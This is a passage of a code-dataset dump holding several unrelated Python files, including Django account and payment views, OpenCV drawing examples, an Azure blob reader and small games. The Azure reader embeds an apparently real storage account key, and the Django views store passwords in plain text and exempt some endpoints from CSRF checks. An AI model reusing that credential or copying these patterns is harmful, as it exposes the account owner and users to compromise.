render(request,'netctoss/account/account_list.html',context=context)\n # else:\n # return redirect(reverse('user:toLogin'))\n\n\ndef accountdelete(request):\n accountid = request.GET.get('accountid')\n\n account = Account.objects.get(pk=accountid)\n\n service_list = account.service_set.all()\n\n for service in service_list:\n service.status = '2'\n service.save()\n\n\n account.status = '2'\n\n account.save()\n\n\n data= {\n 'msg':'ok',\n 'status':200\n }\n return JsonResponse(data=data)\n\n\ndef accountstart(request):\n accountid = request.GET.get('accountid')\n\n account = Account.objects.get(pk=accountid)\n\n account.status = '0'\n\n account.pause_date = None\n\n account.save()\n\n data = {\n 'msg': 'ok',\n 'status': 200\n }\n return JsonResponse(data=data)\n\n\ndef accountToUpdate(request):\n id = request.GET.get('id')\n\n account = Account.objects.get(pk=id)\n\n idcardno = account.idcard_no\n\n # 210727 2000 05 01 xxxx\n # 2000/05/01\n year = idcardno[6:10]\n month = idcardno[10:12]\n day = idcardno[12:14]\n\n birth = year + '/' + month + '/' + day\n\n # 会有异常 原因是因为 如果该对象没有推荐人 那么推荐人的id就为空\n # 所以查询不到对象\n # 解决方法 如果没有推荐人 那么设置为‘’\n\n context = {\n 'account': account,\n 'birth': birth\n }\n\n if account.recommender_id:\n a = Account.objects.get(pk=account.recommender_id)\n context['r_idcard_no'] = a.idcard_no\n\n\n\n return render(request,'netctoss/account/account_modi.html',context=context)\n\n\ndef accountToAdd(request):\n return render(request,'netctoss/account/account_add.html')\n\n\ndef accountAdd(request):\n print('111111')\n real_name = request.POST.get('real_name')\n idcard_no = request.POST.get('idcard_no')\n login_name = request.POST.get('login_name')\n login_passwd = request.POST.get('login_passwd')\n telephone = request.POST.get('telephone')\n # 推荐人的身份证 recommder_idcardno是一个隐藏域\n recommder_id = request.POST.get('recommder_idcardno')\n birthday = request.POST.get('birthday')\n email = request.POST.get('email')\n occupation = request.POST.get('occupation')\n sex = request.POST.get('sex')\n mailaddress = request.POST.get('mailaddress')\n zipcode = request.POST.get('zipcode')\n qq = request.POST.get('qq')\n\n print(recommder_id)\n\n # a = Account.objects.filter(idcard_no=recommder_idcardno).first()\n #\n # xxxx = a.id\n\n\n\n account = Account()\n # xxxx是根据recommder_idcardno 找到对应的account对象 在把 account的id 给 recommender_id\n account.recommender_id = recommder_id\n account.real_name=real_name\n account.idcard_no = idcard_no\n account.login_name = login_name\n account.login_passwd = login_passwd\n account.telephone = telephone\n account.birthdate = birthday\n account.email = email\n account.occupation = occupation\n account.gender = sex\n account.mailaddress = mailaddress\n account.zipcode = zipcode\n account.qq = qq\n\n account.save()\n\n\n\n return redirect(reverse('account:accountlist'))\n\n\ndef accountGetRecommderId(request):\n recommder_idcard = request.GET.get('recommder_idcard')\n\n account = Account.objects.filter(idcard_no=recommder_idcard).first()\n\n recommender_id = account.id\n\n data = {\n 'msg':'ok',\n 'status':200,\n 'recommender_id':recommender_id\n }\n return JsonResponse(data=data)\n\n\ndef accountCheckName(request):\n\n name = request.GET.get('name')\n\n accounts = Account.objects.filter(real_name=name)\n\n data = {\n\n }\n\n if accounts.exists():\n data['msg']='error'\n data['status']=404\n else:\n data['msg']='ok'\n data['status']=200\n\n return JsonResponse(data=data)\n\n@csrf_exempt\ndef accountPause(request):\n accountid = request.POST.get('accountid')\n account = Account.objects.get(pk=accountid)\n\n service_list = account.service_set.all()\n\n for service in service_list:\n service.status = 1\n service.save()\n\n\n account.status = 1\n\n account.save()\n\n data = {\n 'msg':'ok',\n 'status':200\n }\n\n return JsonResponse(data=data)","sub_path":"netctoss/Account1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"646952241","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport random\nimport time\nimport matplotlib.pyplot as plt\n\n\n# In[2]:\n\n\ndef create_cards(num_cards):\n cards = list(range(1,num_cards))\n random.shuffle(cards)\n return(cards)\n\ndef sorting(cards):\n for j in range(1, len(cards)):\n key = cards[j]\n i = j - 1\n while i >= 0 and cards[i] > key:\n cards[i+1] = cards[i]\n i -= 1\n cards[i+1]=key\n return(cards)\n \ndef iteration(number_iteration, number_cards):\n measure_time = []\n for i in range(0, number_iteration):\n cards = create_cards(number_cards)\n start = time.time()\n sorting(cards)\n measure_time.append(time.time()-start)\n average_time = sum(measure_time)/len(measure_time)\n print(\"Average time: \" + \"{0:.9f}\".format(average_time) + \" seconds\")\n return(average_time)\n\n\n# In[3]:\n\n\ntime_cards = []\n\nprint(\"Please wait some time... It's worth it!\")\n\nfor number_cards in range(10, 1000, 100):\n time_in_sec = iteration(1000, number_cards)\n time_cards.append(time_in_sec)\n\n\n# In[4]:\n\n\nplt.plot([10, 110, 210, 310, 410, 510, 610, 710, 810, 910], time_cards)\nplt.xlabel(\"Number cards\")\nplt.ylabel(\"Average runtime in seconds\")\nplt.title(\"Insertion sort algorithm runtime\")\nplt.show()\n\n","sub_path":"Insertion_Sort_Complexity_Analysis.py","file_name":"Insertion_Sort_Complexity_Analysis.py","file_ext":"py","file_size_in_byte":1268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"5865121","text":"import paypal\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db.models import F\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.status import HTTP_400_BAD_REQUEST\nfrom . import Checksum\nfrom .utils import VerifyPaytmResponse\nfrom .models import Transaction,UserProfile\nfrom datetime import datetime,timezone as tz\nfrom django.conf import settings\nfrom paypal.standard.forms import PayPalPaymentsForm\n\n@api_view([\"GET\"])\ndef get_transactions(request):\n \"\"\"\n :param request:\n :return: List of transactions based on user Transactions\n \"\"\"\n try:\n user = request.user\n user_id = User.objects.get(username=user)\n print(user_id)\n transactions = Transaction.objects.filter(user_id__user=user_id).values('status','amount','to_account','date','payment_method')\n print(transactions)\n return Response({\"transactions\":transactions})\n except Exception as e:\n print(e)\n return Response(\"Could Not List the Transactions\".format(str(e)), status=HTTP_400_BAD_REQUEST)\n\ndef payment(request):\n order_id = Checksum.__id_generator__()\n amount = \"1\"\n user = str(request.user)\n user_object = UserProfile.objects.filter(user__username=user).values('phone_number',email = F('user__email'))\n email = user_object[0]['email']\n phone_number = user_object[0]['phone_number']\n data_dict = {\n 'MID': settings.PAYTM_MERCHANT_ID,\n 'INDUSTRY_TYPE_ID': settings.PAYTM_INDUSTRY_TYPE_ID,\n 'WEBSITE': settings.PAYTM_WEBSITE,\n 'CHANNEL_ID': settings.PAYTM_CHANNEL_ID,\n 'CALLBACK_URL': settings.PAYTM_CALLBACK_URL,\n 'MOBILE_NO': str(phone_number),\n 'EMAIL': email,\n 'CUST_ID': '123123',\n 'ORDER_ID':order_id,\n 'TXN_AMOUNT': amount,\n }\n data_dict['CHECKSUMHASH'] = Checksum.generate_checksum(data_dict, settings.PAYTM_MERCHANT_KEY)\n user_profile_object = UserProfile.objects.get(user__username=user)\n # Initiate Transaction\n Transaction.objects.get_or_create(user_id = user_profile_object,id =order_id)\n context = {\n 'payment_url': settings.PAYTM_PAYMENT_GATEWAY_URL,\n 'comany_name': settings.PAYTM_COMPANY_NAME,\n 'data_dict': data_dict\n }\n return render(request, 'paytm.html', context)\n\n\n\n@csrf_exempt\n@api_view([\"POST\"])\ndef paytm_response(request):\n \"\"\"\n Paytm call back url to save the transaction Details\n \"\"\"\n resp = VerifyPaytmResponse(request)\n if resp['verified']:\n response = resp['paytm']\n try:\n txn_object = Transaction.objects.get(id=response['ORDERID'])\n txn_object.txn_id=response['TXNID']\n txn_object.amount=response['TXNAMOUNT']\n txn_object.status=response['STATUS']\n txn_object.payment_method='paytm'\n txn_object.date = str(datetime.now(tz.utc))\n txn_object.save()\n return HttpResponse({\"message\": \"Transaction Sucessful\"}, status=200)\n except ObjectDoesNotExist as e:\n return HttpResponse({\"message\":\"Transaction Was Not Initiated\"}, status=200)\n else:\n return HttpResponse({\"message\":\"Transaction Failed\"}, status=400)\n\ndef process_payment(request):\n order = Checksum.__id_generator__()\n # order = get_object_or_404(Order, id=order_id)\n host = request.get_host()\n\n paypal_dict = {\n 'business': settings.PAYPAL_RECEIVER_EMAIL,\n 'amount': '',\n 'item_name': 'Order {}'.format(order),\n 'invoice': str(order),\n 'currency_code': 'INR',\n 'notify_url': 'http://{}{}'.format(host,\n reverse('paypal-ipn')),\n 'return_url': 'http://{}{}'.format(host,\n reverse('payment_done')),\n 'cancel_return': 'http://{}{}'.format(host,\n reverse('payment_cancelled')),\n }\n\n form = PayPalPaymentsForm(initial=paypal_dict)\n return render(request, 'paypal.html', {'order': order, 'form': form})\n\n@csrf_exempt\ndef payment_done(request):\n return render(request, 'paypal_sucess.html')\n\n\n@csrf_exempt\ndef payment_canceled(request):\n return render(request, 'paypal_failure.html')","sub_path":"pg-server/pgserver/pgserver/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"526267211","text":"from channels.auth import AuthMiddlewareStack # used to popuplate authenticated users info to scope of django channels (similar to django request)\nfrom channels.routing import ProtocolTypeRouter, URLRouter\nimport chat.routing\n\napplication = ProtocolTypeRouter({\n # (http->django views is added by default)\n 'websocket': AuthMiddlewareStack(\n URLRouter(\n chat.routing.websocket_urlpatterns\n )\n ),\n})","sub_path":"django_chat/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"46297564","text":"# 도형 그리기 : 영상이나 이미지 위에 그래픽을 그려 검출 결과를 시각적으로 표시함.\n# 선형 타입(Line Types) : 도형을 그릴 때 어떤 유형의 선으로 그릴지 결정.\n# 비트 쉬프트(bit Shift) : 서브 픽셀(Sub Pixel) 정렬을 지원해서 소수점 이하 자릿수를 표현 가능.\n\n# Import Library\nimport cv2\nimport numpy as np\n\n# 그림판 만들기\nsrc = np.zeros((768, 1366, 3), dtype=np.uint8)\n\n\"\"\"직선 그리기 함수(cv2.line)\ncv2.line(src, pt1, pt2, color, thickness, lineType, shift)\n: 입력 이미지(src)에 시작 좌표(pt1)부터 도착 좌표(pt2)를 지나는 특정 색상(color)과 두께(thinkness)의 직선을 그림.\"\"\"\nsrc = cv2.line(src, (100, 100), (1200, 100), (0, 0, 255), 3, cv2.LINE_AA)\n\n\"\"\"원 그리기 함수(cv2.circle)\ncv2.circle(src, center, radius, color, thickness, lineType, shift)\n: 입력 이미지(src)에 중심점(center)으로부터 반지름(radius) 크기의 특정 색상(color)과 두께(thickness)의 원을 그림.\"\"\"\nsrc = cv2.circle(src, (300, 300), 50, (0, 255, 0), cv2.FILLED, cv2.LINE_4)\n\n\"\"\"사각형 그리기 함수(cv2.rectangle)\ncv2.rectangle(src, pt1, pt2, color, thickness, lineType, shift)\n입력 이미지(src)에 좌측 상단 모서리 좌표(pt1)부터 우측 하단 모서리 좌표(pt2)로 \n구성된 특정 색상(color), 두께(thickness)의 사각형을 그림.\"\"\"\nsrc = cv2.rectangle(src, (500, 200), (1000, 400), (255, 0, 0), 5, cv2.LINE_8)\n\n\"\"\"호 그리기 함수(cv2.ellipse)\ncv2.ellipse(src, center, axes, angle, startAngle, endAngle, color, lineType, shift)\n: 입력 이미지(src)에 중심점(center)으로부터 장축과 단축(axes) 크기를 갖는 \n특정 색상(color)과 두께(thickness)의 호를 그림.\"\"\"\nsrc = cv2.ellipse(src, (1200, 300), (100, 50), 0, 90, 180, (255, 255, 0), 2)\n\n# poly 함수를 사용하는 경우, numpy 형태로 저장된 위치 좌표들이 필요함.\n# n개의 점이 저장된 경우, n각형을 그릴 수 있음.\npst1 = np.array([[100, 500], [300, 500], [200, 600]])\npts2 = np.array([[600, 500], [800, 500], [700, 600]])\n\n\"\"\"내부가 채워지지 않은 다각형 그리기 함수(cv2.polylines)\ncv2.ellipse(src, pts, isClosed, color, thickness, lineType, shift)\n: 입력 이미지(src)에 선들의 묶음(pts)이 이뤄진 N개의 내구가 채워지지 않은 다각형을 그림.\n닫힘여부(isClosed)를 설정해 처음 좌표와 마지막 좌표의 연결 여부를 설정하며, \n설정한 색상(color)과 두께(thickness)의 다각형이 그려짐.\"\"\"\nsrc = cv2.polylines(src, [pst1], True, (0, 255, 255), 2)\n\n\"\"\"내부가 채워진 다각형 그리기 함수(cv2.fillPoly)\ncv2.ellipse(src, pts, color, thickness, lineType, shift, offset)\n: 입력 이미지(src)에 선들의 묶음(pts)이 이뤄진 N개의 내부가 채워지지 않은 다각형을 그림.\n설정한 색상(color)과 두께(thickness)의 다각형이 그려짐.\"\"\"\nsrc = cv2.fillPoly(src, [pts2], (255, 0, 255), cv2.LINE_AA)\n\n\"\"\"문자 그리기 함수(cv2.putText)\ncv2.putText(src, text, org, fontFace, fontScale, color, thickness, lineType, bottomLeftOrigin)\n: 입력 이미지(src)에 문자열(text)을 텍스트 박스의 좌측 상단 모서리(org)를 기준으로 문자가 그려짐.\n설정한 글꼴(fontFace)과 글자크기(fontScale), 색상(color)과 두께(thickness)의 다각형이 그려짐.\"\"\"\nsrc = cv2.putText(src, \"LeeJaeHa\", (900, 600), cv2.FONT_HERSHEY_COMPLEX, 2, (255, 255, 255), 3)\n\n\"\"\" 선형 타입 종류\ncv2.FILLED\t내부 채우기\ncv2.LINE_4\t4점 이웃 연결\ncv2.LINE_8\t8점 이웃 연결\ncv2.LINE_AA\tAntiAlias\n\"\"\"\n\n\"\"\" 글꼴 종류\ncv2.FONT_HERSHEY_SIMPLEX \t보통 크기의 산세리프 글꼴\ncv2.FONT_HERSHEY_PLAIN 작은 크기의 산세리프 글꼴\ncv2.FONT_HERSHEY_DUPLEX 보통 크기의 산세리프 글꼴\ncv2.FONT_HERSHEY_COMPLEX\t 보통 크기의 세리프 글꼴\ncv2.FONT_HERSHEY_TRIPLEX\t 보통 크기의 세리프 글꼴\ncv2.FONT_HERSHEY_COMPLEX_SMALL\t작은 크기의 손글씨\ncv2.FONT_HERSHEY_SCRIPT_SIMPLEX\t보통 크기의 손글씨\ncv2.FONT_HERSHEY_SCRIPT_COMPLEX\t보통 크기의 손글씨\ncv2.FONT_ITALIC\t 기울임 꼴\n\"\"\"\n\n# 이미지 출력 함수\ncv2.imshow(\"src\", src)\n# 키 입력 대기 함수\ncv2.waitKey()\n# 모든 윈도우 창 제거 함수\ncv2.destroyAllWindows()","sub_path":"17. 도형 그리기.py","file_name":"17. 도형 그리기.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"151494491","text":"from sqlalchemy import *\n\n\ndb = create_engine('sqlite:///../colleges.db')\n\ndb.echo = False\n\nmetadata = MetaData(db)\n\ncolleges = Table('universities', metadata, autoload=True)\n\ni = colleges.insert()\n\n\n\nwith open('../pdfs.txt', 'r') as file:\n for line in file:\n name = line\n url = next(file)\n i.execute(name=name, url=url)\n","sub_path":"scripts/databasepopulator.py","file_name":"databasepopulator.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"427145712","text":"from strconv.currates.currdsl import Currency, InEnglish, InRussian\nfrom strconv.currates.types import DataSource\nfrom strconv.currates.extractors import field, iso_date, timestamp_date\n\n__EXCHANGE_RATE_API_KEY = \"XXXXXXXXXXXXXXXXXXXXXXXX\"\n__COINMARKETCAP_API_KEY = \"XXXXXXXXXXXXXXXXXXXXXXXX\"\n\n_COINMARKETCAP_LIMIT = 1200\n\nUPDATE_VOLATILE_PERIOD_IN_HOURS = 1\n\nEXCHANGE_RATE_SOURCES = [\n DataSource('api.exchangerate.host', \"https://api.exchangerate.host/latest?base=USD\",\n field('success'), field('rates'), iso_date('date')),\n DataSource('exchangerate-api.com', f\"https://v6.exchangerate-api.com/v6/{__EXCHANGE_RATE_API_KEY}/latest/USD\",\n field('result'), field('conversion_rates'), timestamp_date('time_last_update_unix')),\n DataSource('coinmarketcap.com',\n f\"https://pro-api.coinmarketcap.com/v1/cryptocurrency/listings/latest?start=1&limit={_COINMARKETCAP_LIMIT}&convert=USD\",\n status_checker=lambda json: json['status']['error_code'] == 0,\n rates_extractor=lambda json: {x['symbol']:(1/x['quote']['USD']['price']) for x in json['data']},\n date_extractor=iso_date('status.timestamp'),\n headers={'X-CMC_PRO_API_KEY': __COINMARKETCAP_API_KEY},\n volatile=True),\n]\n\nCURRENCIES_MAPPING = [\n Currency('RUB', 'RUR', 'rur', '₽', 'руб.', 'руб', 'р.', 'р', words=[\n InEnglish('ruble'), InRussian('рубл', ('ь', 'я', 'ей'))\n ]),\n Currency('USD', '$', words=[\n InEnglish('dollar'), InRussian('доллар', ('', 'а', 'ов'))\n ]),\n Currency('EUR', '€', words=[\n InEnglish('euro'), InRussian('евро')\n ]),\n Currency('BTC', '₿', words=[\n InEnglish('bitcoin'), InRussian('биткоин', ('', 'а', 'ов'))\n ]),\n Currency('INR', '₹', '₨', 'Rs', 'Rp'),\n Currency('GBP', '£'),\n Currency('ILS', '₪'),\n]\n","sub_path":"examples/currates_conf.py","file_name":"currates_conf.py","file_ext":"py","file_size_in_byte":1905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"289113442","text":"import os\nimport string\nimport json\nimport uuid\nimport avro.schema\n\nfrom azure.storage.blob import ContainerClient, BlobClient\nfrom avro.datafile import DataFileReader, DataFileWriter\nfrom avro.io import DatumReader, DatumWriter\n\nSTORAGE_CONNECTION_STRING = \"DefaultEndpointsProtocol=https;AccountName=storageskeventhub;AccountKey=eMvbcSlRl9DnZITSOmrpMUnMBUyQ3m18XJdT1sHfqjSYjcMjdz4NiSKBvbOLcas9PYyUUicGm9j3jEX3w38c4Q==;EndpointSuffix=core.windows.net\"\nSTORAGE_CONTAINER_NAME = \"containereventhub\"\n\n\n\ndef processBlob2(filename):\n reader = DataFileReader(open(filename, 'rb'), DatumReader())\n dict = {}\n \n for reading in reader:\n parsed_json = json.loads(reading[\"Body\"])\n if not 'id' in parsed_json:\n return\n if not parsed_json['id'] in dict:\n list = []\n dict[parsed_json['id']] = list\n else:\n list = dict[parsed_json['id']]\n list.append(parsed_json)\n reader.close()\n for device in dict.keys():\n filename = os.getcwd() + '\\\\' + str(device) + '.csv'\n deviceFile = open(filename, \"a\")\n for r in dict[device]:\n deviceFile.write(\", \".join([str(r[x]) for x in r.keys()])+'\\n')\n\ndef startProcessing():\n print('Processor started using path: ' + os.getcwd())\n # Create a blob container client.\n container = ContainerClient.from_connection_string(STORAGE_CONNECTION_STRING, container_name=STORAGE_CONTAINER_NAME)\n blob_list = container.list_blobs() # List all the blobs in the container.\n for blob in blob_list:\n # Content_length == 508 is an empty file, so process only content_length > 508 (skip empty files). \n if blob.size > 508:\n print('Downloaded a non empty blob: ' + blob.name)\n # Create a blob client for the blob.\n blob_client = ContainerClient.get_blob_client(container, blob=blob.name)\n # Construct a file name based on the blob name.\n cleanName = str.replace(blob.name, '/', '_')\n cleanName = os.getcwd() + '\\\\' + cleanName \n with open(cleanName, \"wb+\") as my_file: # Open the file to write. Create it if it doesn't exist. \n my_file.write(blob_client.download_blob().readall()) # Write blob contents into the file.\n try:\n processBlob2(cleanName) # Convert the file into a CSV file.\n except:\n print('test')\n os.remove(cleanName) # Remove the original downloaded file.\n # Delete the blob from the container after it's read.\n container.delete_blob(blob.name)\n\nstartProcessing()","sub_path":"EventHub/read_data.py","file_name":"read_data.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"155188778","text":"\nimport random\n\ndef guessWhat(a):\n randomNum = random.randint(0,20)\n print(\"Random Number ============>>>>> \" ,randomNum)\n if int(a) > randomNum :\n return True\n else:\n return False\n\n# Gawi : 0 / Bawi: 1 / Bo : 2 \ndef drawBet(a):\n randomNum = random.randint(0,2)\n #print(\"random ========>>>\",randomNum,a)\n print(\"알파고 선택은: \",drawBetDescription(randomNum))\n if a == 0 :\n if randomNum == 0:\n return \"E\"\n elif randomNum == 1:\n return \"L\"\n else:\n return \"W\"\n elif a == 1:\n if randomNum == 0:\n return \"W\"\n elif randomNum == 1:\n return \"E\"\n else:\n return \"L\"\n elif a == 2 :\n if randomNum == 0:\n return \"L\"\n elif randomNum == 1:\n return \"W\"\n else:\n return \"E\"\n\ndef drawBetDescription (drawNum):\n if drawNum == 0:\n return \"가위\"\n elif drawNum == 1:\n return \"바위\"\n elif drawNum == 2:\n return \"보\"","sub_path":"guessGame/guessDef.py","file_name":"guessDef.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"640683642","text":"# 문제\n# 수빈이는 동생과 숨바꼭질을 하고 있다. 수빈이는 현재 점 N(0 ≤ N ≤ 100,000)에 있고, 동생은 점 K(0 ≤ K ≤ 100,000)에 있다. 수빈이는 걷거나 순간이동을 할 수 있다. 만약, 수빈이의 위치가 X일 때 걷는다면 1초 후에 X-1 또는 X+1로 이동하게 된다. 순간이동을 하는 경우에는 1초 후에 2*X의 위치로 이동하게 된다.\n#\n# 수빈이와 동생의 위치가 주어졌을 때, 수빈이가 동생을 찾을 수 있는 가장 빠른 시간이 몇 초 후인지 구하는 프로그램을 작성하시오.\n#\n# 입력\n# 첫 번째 줄에 수빈이가 있는 위치 N과 동생이 있는 위치 K가 주어진다. N과 K는 정수이다.\n#\n# 출력\n# 수빈이가 동생을 찾는 가장 빠른 시간을 출력한다.\nfrom collections import deque\n\nlimit = 200001\nn, k = map(int, input().split())\nlocation = [-1]*limit\nq = deque()\nq.append(n)\nlocation[n] = 0\ndx = [-1,1,2]\n\nflag = True\nwhile (q and flag):\n v = q.popleft()\n\n for i in range(3):\n if dx[i]==2:\n nx = 2*v\n else:\n nx = v + dx[i]\n if 0<=nx\n print(c + d)\nTypeError: unsupported operand type(s) for +: 'int' and 'str'\n\"\"\"\n\n","sub_path":"day1/exercise_2_7.py","file_name":"exercise_2_7.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"514260886","text":"from sklearn.feature_extraction.text import TfidfVectorizer\nfrom UMBC_EVENT_KEYWORD_SIMILARITY import read_event_list\nimport pandas as pd\nimport numpy as np\n\ndef create_document_similarity_matrix(document_list):\n\n tfidf = TfidfVectorizer().fit_transform(document_list)\n # no need to normalize, since Vectorizer will return normalized tf-idf\n return tfidf * tfidf.T\n\n\ndef top_n_similar_event(document_similarity_matrix, events_ids, event_index,n):\n event_list_df = pd.DataFrame(np.zeros((len(events_ids), 2)),\n columns=['events_id', 'weight'])\n event_list_df['events_id'] = event_list_df['events_id'].astype(str)\n\n\n for i in range(len(events_ids)):\n if i!=event_index:\n event_list_df.set_value(i, 'events_id', events_ids[i], takeable=False)\n event_list_df.set_value(i, 'weight', document_similarity_matrix[event_index,i], takeable=False)\n\n sorted_list = event_list_df.sort_values(by='weight', ascending=0)\n\n if len(events_ids) <= n:\n return sorted_list\n else:\n return sorted_list.head(n)\n\ndef get_top_similar_events(db_name,top_n_similar,total_needed_by_sim,selected_ids_before):\n event_list = read_event_list(db_name)\n event_list_processed_ids = []\n event_list_processed_desc = []\n\n for event in event_list:\n event_list_processed_ids.append(event['events_id'])\n event_list_processed_desc.append(event['evtdesc'])\n\n document_similarity_matrix = create_document_similarity_matrix(event_list_processed_desc)\n flag = 0\n for id in selected_ids_before:\n if flag==0:\n top_list=(top_n_similar_event(document_similarity_matrix, event_list_processed_ids, event_list_processed_ids.index(id), top_n_similar))\n flag=1\n else:\n top_list.append(top_n_similar_event(document_similarity_matrix, event_list_processed_ids,\n event_list_processed_ids.index(id), top_n_similar))\n\n sorted_list = top_list.sort_values(by='weight', ascending=0)\n\n counter = 0\n selected_ids_sofar = list(selected_ids_before)\n #print \"start\"\n #print selected_ids_sofar\n #print \"end\"\n #return 0\n for i in range(len(sorted_list.index)):\n if counter == total_needed_by_sim:\n break\n\n eventid = sorted_list.get_value(sorted_list.index[i], 'events_id')\n #print \"test:\"+eventid\n if not(eventid in selected_ids_sofar):\n counter +=1\n selected_ids_sofar.append(eventid)\n\n return selected_ids_sofar\n\n\n\n","sub_path":"document_similarity.py","file_name":"document_similarity.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"468481467","text":"from random import random, randint, choice\n\n\nclass Player:\n \"\"\"Класс игрока\n\n \"\"\"\n\n def __init__(self, name):\n self.name = name # имя игрока\n self.hp = 100 # жизни игрока\n self.low_hit = randint(18, 25) # урон в небольшом диапазоне\n self.high_hit = randint(10, 35) # урон в большом диапазоне\n self.heal = randint(18, 25) # лечение в небольшом диапазоне\n\n def make_low_hit(self, enemy):\n \"\"\"Функция для нанесения умеренного урона с небольшим диапозоном \n\n \"\"\"\n print(f'\\n*** {self.name}, Ваш урон в небольшом диапазоне (18-25) равен: {self.low_hit}dmg\\n')\n\n enemy.hp -= self.low_hit\n if enemy.hp < 0: # нижняя граница жизней\n enemy.hp = 0\n print(f'--> {self.name} нанёс {enemy.name}u -{self.low_hit}dmg!')\n\n print(f'\\n*** {enemy.name} HP(♥): {enemy.hp}hp')\n print(f'*** {self.name} HP(♥): {self.hp}hp')\n\n def make_high_hit(self, enemy):\n \"\"\"Функция для нанесения урона с большим диапозоном\n\n \"\"\"\n print(f'\\n*** {self.name}, Ваш урон в большом диапазоне (10-35) равен: {self.high_hit}dmg\\n')\n\n enemy.hp -= self.high_hit\n if enemy.hp < 0: # нижняя граница жизней\n enemy.hp = 0\n print(f'--> {self.name} нанёс {enemy.name}u -{self.high_hit}dmg!')\n\n print(f'\\n*** {enemy.name} HP(♥): {enemy.hp}hp')\n print(f'*** {self.name} HP(♥): {self.hp}hp')\n\n def make_heal(self):\n \"\"\"Функция для исцеления в небольшом диапазоне\n\n \"\"\"\n print(f'\\n*** {self.name} решил исцелить себя на +{self.heal}hp!')\n print(f'*** {self.name}, на данный момент Ваше здоровье: {self.hp}hp')\n\n self.hp += self.heal\n if self.hp > 100: # верхняя граница полных жизней\n self.hp = 100\n print(f'\\n--> {self.name} исцелил себя на {self.heal}hp!')\n\n print(f'\\n*** {self.name} HP(♥): {self.hp}hp')\n return self.hp\n\n def make_act(self, enemy):\n \"\"\"Функция для выбора атаки\n\n \"\"\"\n self.act = [self.make_low_hit, self.make_high_hit]\n r_choice = choice(self.act)(enemy) # рандомный выбор атаки\n return r_choice\n\n\ndef new_game(pl_1, pl_2):\n \"\"\"Функция алгоритма работы игры\n\n \"\"\"\n count = 1\n print('\\n' + '*' * 33)\n print('*** START GAME! ***')\n print('8' * 33 +'\\n')\n print(f'*** ИГРОК №1: {pl_1.name}')\n print(f'*** ИГРОК №2: {pl_2.name}\\n')\n\n while pl_1.hp > 0 and pl_2.hp > 0:\n r_turn = random() # рандомное число для определения игрока, который будет делать ход\n r_heal = random() # рандомное число для выполнения функции лечения\n print('-' * 33)\n print(f'- ДЕЙСТВИЕ №{count} -')\n print('-' * 33)\n if r_turn > 0.5:\n print(f'*** Сейчас ход {pl_1.name}a!'.upper())\n if r_heal > 0.5:\n pl_1.make_act(pl_2)\n elif r_heal < 0.5 and pl_1.hp < 35:\n if r_heal > 0.11:\n pl_1.make_heal()\n else:\n pl_1.make_act(pl_2)\n else:\n pl_1.make_heal()\n else:\n print(f'*** Сейчас ход {pl_2.name}a!'.upper())\n if r_heal < 0.5:\n pl_2.make_act(pl_1)\n else:\n pl_2.make_heal()\n print('-' * 72 + '\\n')\n count += 1\n else:\n if pl_1.hp <= 0:\n print(f'\\n† † † {pl_1.name} DEAD! † † † \\n\\n░░░░░ {pl_2.name} WIN! CONGRATULATION!!! ░░░░░'.upper())\n elif pl_2.hp <= 0:\n print(f'\\n† † † {pl_2.name} DEAD! † † † \\n\\n░░░░░ {pl_1.name} WIN! CONGRATULATION!!! ░░░░░'.upper())\n print('\\n' + '*' * 33)\n print('*** GAME OVER! ***')\n print('*' * 33)\n\ncomputer = Player(\"Botnet\") # инстанс класса\nhuman = Player(\"WhiteHatHacker\") # инстанс класса\n\nnew_game(computer, human) # вызов функции новой игры\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"43990269","text":"'''\r\nSDA2OpenLyrics_extractor2.py\r\nThis program reads a list of link in a seperate file (sda_hymnals_list.txt),\r\nopens the source, reads the title of hymn and the lyrics, reads the theme/topic\r\nof the songs and outputs the result to an xml file with the openlyrics format\r\nver. 0.8\r\n\r\nIts only purpose is for the SDA church use, and nowhere else.\r\n\r\nauthor: Arnold Chand\r\ndate Modified: 03/24/2016\r\n'''\r\nimport re\r\nimport urllib.request as request\r\nfrom bs4 import BeautifulSoup\r\nimport authors as sda\r\n\r\nOUTPUT_FILE_DIR = \"hymnals/adventisthymns_com/\"\r\nTEMPLATE_FILE = \"openlyrics_template.xml\"\r\nLIST_FILE = \"adventishymnscom_list.txt\"\r\n\r\nVERSE_FORMAT = \"{1}\\n\"\r\n\r\nCOPYRIGHT_FORMAT = \"{0}\"\r\n\r\nAUTHOR_FORMAT = \"{0}\"\r\n\r\nESCAPE_CHARS = {\r\n \"dash\": 